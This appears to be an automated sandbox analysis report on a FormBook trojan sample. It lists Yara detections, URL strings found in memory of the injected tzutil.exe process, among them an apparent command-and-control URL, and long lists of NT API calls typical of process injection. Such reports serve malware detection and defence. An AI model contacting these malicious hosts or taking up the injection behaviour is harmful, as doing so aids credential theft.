Source: tzutil.exe, 00000006.00000002.4509911861.00000000033DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: tzutil.exe, 00000006.00000002.4509911861.00000000033DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: tzutil.exe, 00000006.00000002.4509911861.00000000033DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: tzutil.exe, 00000006.00000002.4509911861.00000000033DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: tzutil.exe, 00000006.00000002.4509911861.00000000033DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: tzutil.exe, 00000006.00000003.2475093801.0000000008546000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.redimpact.online&rand=
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: tzutil.exe, 00000006.00000002.4511343787.00000000049BA000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.00000000032FA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.cs0724sd92jj.cloud/tma8/?1Dd0AZ=9LH/tkN2eceTuuLmYHB7mIhvDU5vHmoPFh9uxAKiqHzTpqc2ajrPE0tA
Source: tzutil.exe, 00000006.00000002.4513223018.0000000008618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004696000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002FD6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_lan
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land_h
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.redimpact.online&utm_medium=parking&utm
Source: tzutil.exe, 00000006.00000002.4511343787.0000000004504000.00000004.10000000.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000002.4510820390.0000000002E44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2587605624.0000000013B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.redimpact.online&reg_source=parking_auto

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.3qsTcL9MOT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.3qsTcL9MOT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2291851698.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4512495754.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4510684852.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4510740156.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2297013663.0000000001430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.3qsTcL9MOT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.3qsTcL9MOT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2291851698.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4512495754.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4510684852.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4510740156.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2297013663.0000000001430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0042C4C3 NtClose,	3_2_0042C4C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052B60 NtClose,LdrInitializeThunk,	3_2_01052B60
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01052DF0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_01052C70
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010535C0 NtCreateMutant,LdrInitializeThunk,	3_2_010535C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01054340 NtSetContextThread,	3_2_01054340
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01054650 NtSuspendThread,	3_2_01054650
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052B80 NtQueryInformationFile,	3_2_01052B80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052BA0 NtEnumerateValueKey,	3_2_01052BA0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052BE0 NtQueryValueKey,	3_2_01052BE0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052BF0 NtAllocateVirtualMemory,	3_2_01052BF0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052AB0 NtWaitForSingleObject,	3_2_01052AB0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052AD0 NtReadFile,	3_2_01052AD0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052AF0 NtWriteFile,	3_2_01052AF0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052D00 NtSetInformationFile,	3_2_01052D00
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052D10 NtMapViewOfSection,	3_2_01052D10
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052D30 NtUnmapViewOfSection,	3_2_01052D30
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052DB0 NtEnumerateKey,	3_2_01052DB0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052DD0 NtDelayExecution,	3_2_01052DD0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052C00 NtQueryInformationProcess,	3_2_01052C00
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052C60 NtCreateKey,	3_2_01052C60
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052CA0 NtQueryInformationToken,	3_2_01052CA0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052CC0 NtQueryVirtualMemory,	3_2_01052CC0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052CF0 NtOpenProcess,	3_2_01052CF0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052F30 NtCreateSection,	3_2_01052F30
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052F60 NtCreateProcessEx,	3_2_01052F60
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052F90 NtProtectVirtualMemory,	3_2_01052F90
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052FA0 NtQuerySection,	3_2_01052FA0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052FB0 NtResumeThread,	3_2_01052FB0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052FE0 NtCreateFile,	3_2_01052FE0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052E30 NtWriteVirtualMemory,	3_2_01052E30
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052E80 NtReadVirtualMemory,	3_2_01052E80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052EA0 NtAdjustPrivilegesToken,	3_2_01052EA0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052EE0 NtQueueApcThread,	3_2_01052EE0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01053010 NtOpenDirectoryObject,	3_2_01053010
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01053090 NtSetValueKey,	3_2_01053090
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010539B0 NtGetContextThread,	3_2_010539B0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01053D10 NtOpenProcessToken,	3_2_01053D10
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01053D70 NtOpenThread,	3_2_01053D70
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B64340 NtSetContextThread,LdrInitializeThunk,	6_2_03B64340
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B64650 NtSuspendThread,LdrInitializeThunk,	6_2_03B64650
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_03B62BA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_03B62BF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_03B62BE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62B60 NtClose,LdrInitializeThunk,	6_2_03B62B60
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62AF0 NtWriteFile,LdrInitializeThunk,	6_2_03B62AF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62AD0 NtReadFile,LdrInitializeThunk,	6_2_03B62AD0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62FB0 NtResumeThread,LdrInitializeThunk,	6_2_03B62FB0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62FE0 NtCreateFile,LdrInitializeThunk,	6_2_03B62FE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62F30 NtCreateSection,LdrInitializeThunk,	6_2_03B62F30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_03B62E80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_03B62EE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03B62DF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62DD0 NtDelayExecution,LdrInitializeThunk,	6_2_03B62DD0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_03B62D30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_03B62D10
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_03B62CA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_03B62C70
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62C60 NtCreateKey,LdrInitializeThunk,	6_2_03B62C60
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B635C0 NtCreateMutant,LdrInitializeThunk,	6_2_03B635C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B639B0 NtGetContextThread,LdrInitializeThunk,	6_2_03B639B0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62B80 NtQueryInformationFile,	6_2_03B62B80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62AB0 NtWaitForSingleObject,	6_2_03B62AB0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62FA0 NtQuerySection,	6_2_03B62FA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62F90 NtProtectVirtualMemory,	6_2_03B62F90
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62F60 NtCreateProcessEx,	6_2_03B62F60
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62EA0 NtAdjustPrivilegesToken,	6_2_03B62EA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62E30 NtWriteVirtualMemory,	6_2_03B62E30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62DB0 NtEnumerateKey,	6_2_03B62DB0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62D00 NtSetInformationFile,	6_2_03B62D00
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62CF0 NtOpenProcess,	6_2_03B62CF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62CC0 NtQueryVirtualMemory,	6_2_03B62CC0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B62C00 NtQueryInformationProcess,	6_2_03B62C00
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B63090 NtSetValueKey,	6_2_03B63090
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B63010 NtOpenDirectoryObject,	6_2_03B63010
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B63D10 NtOpenProcessToken,	6_2_03B63D10
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B63D70 NtOpenThread,	6_2_03B63D70
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032E9330 NtDeleteFile,	6_2_032E9330
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032E93D0 NtClose,	6_2_032E93D0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032E9240 NtReadFile,	6_2_032E9240
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032E90D0 NtCreateFile,	6_2_032E90D0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032E9530 NtAllocateVirtualMemory,	6_2_032E9530

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_0147DEEC	0_2_0147DEEC
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_033541A4	0_2_033541A4
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_03350006	0_2_03350006
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_03350040	0_2_03350040
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_03351178	0_2_03351178
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_03355A58	0_2_03355A58
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_03351FF1	0_2_03351FF1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_079C1930	0_2_079C1930
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_079C65B7	0_2_079C65B7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_079C4DC8	0_2_079C4DC8
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_079C65C8	0_2_079C65C8
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_079C4558	0_2_079C4558
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_079CB570	0_2_079CB570
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_079C8370	0_2_079C8370
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_079C4990	0_2_079C4990
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_079C1921	0_2_079C1921
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00418513	3_2_00418513
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0040E02E	3_2_0040E02E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0040E033	3_2_0040E033
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00402220	3_2_00402220
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0042EA93	3_2_0042EA93
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_004024C6	3_2_004024C6
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_004024D0	3_2_004024D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0040FD8A	3_2_0040FD8A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0040FD93	3_2_0040FD93
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00402E50	3_2_00402E50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_004166EE	3_2_004166EE
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_004166F3	3_2_004166F3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0040FFB3	3_2_0040FFB3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01010100	3_2_01010100
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BA118	3_2_010BA118
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A8158	3_2_010A8158
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E01AA	3_2_010E01AA
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D41A2	3_2_010D41A2
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D81CC	3_2_010D81CC
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B2000	3_2_010B2000
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DA352	3_2_010DA352
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E03E6	3_2_010E03E6
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102E3F0	3_2_0102E3F0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A02C0	3_2_010A02C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020535	3_2_01020535
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E0591	3_2_010E0591
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C4420	3_2_010C4420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D2446	3_2_010D2446
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CE4F6	3_2_010CE4F6
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01044750	3_2_01044750
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101C7C0	3_2_0101C7C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103C6E0	3_2_0103C6E0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01036962	3_2_01036962
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010EA9A6	3_2_010EA9A6
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01022840	3_2_01022840
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102A840	3_2_0102A840
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010068B8	3_2_010068B8
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E8F0	3_2_0104E8F0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DAB40	3_2_010DAB40
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D6BD7	3_2_010D6BD7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102AD00	3_2_0102AD00
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BCD1F	3_2_010BCD1F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01038DBF	3_2_01038DBF
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101ADE0	3_2_0101ADE0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020C00	3_2_01020C00
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C0CB5	3_2_010C0CB5
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01010CF2	3_2_01010CF2
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01062F28	3_2_01062F28
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01040F30	3_2_01040F30
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C2F30	3_2_010C2F30
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01094F40	3_2_01094F40
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109EFA0	3_2_0109EFA0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01012FC8	3_2_01012FC8
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102CFE0	3_2_0102CFE0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DEE26	3_2_010DEE26
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020E59	3_2_01020E59
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01032E90	3_2_01032E90
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DCE93	3_2_010DCE93
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DEEDB	3_2_010DEEDB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010EB16B	3_2_010EB16B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0105516C	3_2_0105516C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100F172	3_2_0100F172
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102B1B0	3_2_0102B1B0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CF0CC	3_2_010CF0CC
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010270C0	3_2_010270C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D70E9	3_2_010D70E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DF0E0	3_2_010DF0E0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D132D	3_2_010D132D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100D34C	3_2_0100D34C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0106739A	3_2_0106739A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010252A0	3_2_010252A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103B2C0	3_2_0103B2C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C12ED	3_2_010C12ED
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D7571	3_2_010D7571
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BD5B0	3_2_010BD5B0
